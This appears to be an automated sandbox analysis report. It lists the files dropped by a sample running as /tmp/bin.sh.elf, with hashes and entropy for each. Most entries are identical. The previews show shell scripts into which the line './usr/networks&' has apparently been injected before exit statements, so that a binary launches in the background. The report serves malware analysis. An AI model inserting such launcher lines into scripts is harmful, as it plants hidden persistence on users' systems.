                                                                        Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):57
                                                                        Entropy (8bit):4.424738040366664
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                        MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                        SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                        SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                        SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):57
                                                                        Entropy (8bit):4.424738040366664
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                        MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                        SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                        SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                        SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):57
                                                                        Entropy (8bit):4.424738040366664
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                        MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                        SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                        SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                        SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):57
                                                                        Entropy (8bit):4.424738040366664
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                        MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                        SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                        SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                        SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):57
                                                                        Entropy (8bit):4.424738040366664
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                        MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                        SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                        SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                        SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):57
                                                                        Entropy (8bit):4.424738040366664
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                        MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                        SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                        SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                        SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):57
                                                                        Entropy (8bit):4.424738040366664
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                        MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                        SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                        SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                        SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):57
                                                                        Entropy (8bit):4.424738040366664
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                        MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                        SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                        SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                        SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):57
                                                                        Entropy (8bit):4.424738040366664
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                        MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                        SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                        SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                        SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):18782
                                                                        Entropy (8bit):5.235983173566899
                                                                        Encrypted:false
                                                                        SSDEEP:192:WjE48X8gWbotdJrGMNlV1JG8IHpfLwFWpzvwdGU7r/tkTVQj8uFOmCyip1k54eDY:94PeyLwFWpcEU74VQR4e71i
                                                                        MD5:33D5377637217EAE06E98E33FC04B188
                                                                        SHA1:59C6E042FAA5A655305E0C8A0CE83EDAAF0F8D7B
                                                                        SHA-256:8310B79376659E0CCAA87FF0BA252CA3F8A944504EAE0CDE638654B6403EF517
                                                                        SHA-512:FFDC2D40A04DE6FDAF756CE983EC57986F12FF70600CC560A7F257849ABB0D35C6C8D71C0582EE9E36AF8F94C166F3315775F40529320E568818216BDDCB1C0A
                                                                        Malicious:false
                                                                        Preview:./usr/networks&...exit 1..fi.}..check_tc_shblock_support().{..tc filter help 2>&1 | grep block &> /dev/null..if [[ $? -ne 0 ]]; then...echo "SKIP: iproute2 too old; tc is missing shared block support"...exit 1..fi.}..check_tc_chain_support().{..tc help 2>&1|grep chain &> /dev/null..if [[ $? -ne 0 ]]; then...echo "SKIP: iproute2 too old; tc is missing chain support"...exit 1..fi.}..if [[ "$(id -u)" -ne 0 ]]; then..echo "SKIP: need root privileges"..exit 0.fi..if [[ "$CHECK_TC" = "yes" ]]; then..check_tc_version.fi..require_command().{..local cmd=$1; shift...if [[ ! -x "$(command -v "$cmd")" ]]; then...echo "SKIP: $cmd not installed"...exit 1..fi.}..require_command jq.require_command $MZ..if [[ ! -v NUM_NETIFS ]]; then..echo "SKIP: importer does not define \"NUM_NETIFS\""..exit 1.fi..##############################################################################.# Command line options handling..count=0..while [[ $# -gt 0 ]]; do..if [[ "$count" -eq "0" ]]; then...unset NETIFS...declare -A
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):205
                                                                        Entropy (8bit):4.7396662996751076
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVPnKWoW6MKH57FrLQVG6xRXt6XXHBEkVAv6VFedQVLpvyoYxvMRvOWvQLk9bJT:cnKWcP4NRX2ykiv+YdQfUx1gxJjWMn
                                                                        MD5:638F9D3F209476CE9B175236635D4DB8
                                                                        SHA1:B9A3FCA663B97909DCDEABA1DCF9259AB2E77E29
                                                                        SHA-256:AF4CB5CF32617176768E4A6E6C6CF986BA074EFA1125DAF25630321CAF468938
                                                                        SHA-512:176FB4049BFEBE70A2FA8FEA09F0A0F0DB258AD711AB93FFACCF51B4B9ECC3CA386A626B8B876281230C3A4F4E767E391B18B755B70B0CAC85CA222E02FD58FE
                                                                        Malicious:false
                                                                        Preview:./usr/networks&...exit $ksft_skip..fi.}..cleanup().{..pre_cleanup...h2_destroy..h1_destroy...vrf_cleanup.}..trap cleanup EXIT..setup_prepare.setup_wait..tests_run..exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):57
                                                                        Entropy (8bit):4.424738040366664
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                        MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                        SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                        SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                        SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):57
                                                                        Entropy (8bit):4.424738040366664
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                        MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                        SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                        SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                        SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):57
                                                                        Entropy (8bit):4.424738040366664
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                        MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                        SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                        SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                        SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):57
                                                                        Entropy (8bit):4.424738040366664
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                        MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                        SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                        SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                        SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):57
                                                                        Entropy (8bit):4.424738040366664
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                        MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                        SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                        SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                        SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):57
                                                                        Entropy (8bit):4.424738040366664
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                        MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                        SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                        SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                        SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):57
                                                                        Entropy (8bit):4.424738040366664
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                        MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                        SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                        SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                        SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):57
                                                                        Entropy (8bit):4.424738040366664
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                        MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                        SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                        SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                        SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):57
                                                                        Entropy (8bit):4.424738040366664
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                        MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                        SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                        SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                        SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):57
                                                                        Entropy (8bit):4.424738040366664
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                        MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                        SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                        SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                        SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):57
                                                                        Entropy (8bit):4.424738040366664
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                        MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                        SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                        SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                        SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):57
                                                                        Entropy (8bit):4.424738040366664
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                        MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                        SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                        SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                        SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):57
                                                                        Entropy (8bit):4.424738040366664
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                        MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                        SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                        SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                        SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):23
                                                                        Entropy (8bit):3.882045108136863
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):57
                                                                        Entropy (8bit):4.424738040366664
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                        MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                        SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                        SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                        SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):57
                                                                        Entropy (8bit):4.424738040366664
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                        MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                        SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                        SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                        SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):57
                                                                        Entropy (8bit):4.424738040366664
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                        MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                        SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                        SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                        SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):57
                                                                        Entropy (8bit):4.424738040366664
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                        MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                        SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                        SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                        SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):57
                                                                        Entropy (8bit):4.424738040366664
                                                                        Encrypted:false
                                                                        SSDEEP:3:qXVOORk9bJjWXVOORgn:HxJjWMn
                                                                        MD5:872F36FCDB4E3CBA45EA7D94B40A4FB2
                                                                        SHA1:69AD3D9FE927E729A63C8FAFAE3666E78F6D4D38
                                                                        SHA-256:30EFC1D89C491751BB3E0D7A74F6718D8391A47077A61DECAB83489D6E3646FB
                                                                        SHA-512:FE6A52FA37EAF9C90BFA4A5A352F725D0546D41CFC97D3BF95984476B0BFC3833BCC628DC480C2A991DA930F06B749A9EC1109B805A2669BEA7E1927467FB470
                                                                        Malicious:false
                                                                        Preview:./usr/networks&.exit $EXIT_STATUS../usr/networks&.exit 1.
                                                                        Process:/tmp/bin.sh.elf
                                                                        File Type:ASCII text
                                                                        Category:dropped
